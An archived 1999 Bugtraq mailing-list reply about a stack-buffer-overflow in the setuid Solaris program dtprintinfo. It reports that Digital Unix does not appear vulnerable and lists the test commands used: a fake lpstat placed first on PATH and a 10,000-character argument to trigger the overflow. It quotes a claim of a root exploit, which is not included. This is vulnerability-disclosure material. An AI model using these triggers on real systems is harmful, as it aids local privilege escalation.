[10514] in bugtraq
Re: Solaris2.6,2.7 dtprintinfo exploits
daemon@ATHENA.MIT.EDU (Lamont Granquist)
Tue May 11 21:20:41 1999
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id: <Pine.SGI.4.05.9905101310540.13657-100000@raven.genome.washington.edu>
Date: Mon, 10 May 1999 13:13:29 -0700
Reply-To: Lamont Granquist <lamontg@RAVEN.GENOME.WASHINGTON.EDU>
From: Lamont Granquist <lamontg@RAVEN.GENOME.WASHINGTON.EDU>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <19990509171229.16280.qmail@www0t.netaddress.usa.net>
Digital Unix 4.0 through 4.0D w/BL11 (aka patch kit 3) does not appear to
be vulnerable to this problem. Tested with:
% cat > lpstat
echo "system for lpprn: server.com"
^D
% chmod 755 lpstat
% setenv PATH .:$PATH
% /usr/dt/bin/dtprintinfo -p `perl -e '{ print "A" x 10000 }'`
On Mon, 10 May 1999, UNYUN@ShadowPenguin wrote:
> "dtprintinfo" is suid program, the stack buffer can be overflowed by '-p'
> option. I made an exploit program that can get root for Intel edition of
> Solaris2.6 and Solaris 2.7.
--
Lamont Granquist lamontg@genome.washington.edu
Dept. of Molecular Biotechnology (206)616-5735 fax: (206)685-7344
Box 352145 / University of Washington / Seattle, WA 98195
PGP pubkey: finger lamontg@raven.genome.washington.edu | pgp -fka
